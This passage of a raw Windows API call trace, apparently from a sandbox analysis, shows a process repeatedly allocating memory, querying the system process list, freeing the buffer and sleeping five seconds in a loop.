NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.715] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.716] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.719] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.723] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.725] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.729] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.730] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.732] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.732] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.737] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.740] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.740] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.744] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.744] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.747] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.751] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.753] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.754] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.754] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.758] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.760] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.761] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.761] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.765] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.765] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.767] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.772] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.775] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.775] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.778] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.779] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.782] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.782] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.787] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.789] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.790] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.794] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.794] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.797] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.801] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.803] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.804] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.804] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.807] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.808] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.811] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.818] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.820] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.821] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.826] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.827] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.830] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.836] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.837] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.839] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.843] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.844] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.853] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.855] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.861] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.863] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0209.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0209.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0209.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0209.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0209.869] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.870] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0209.872] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, 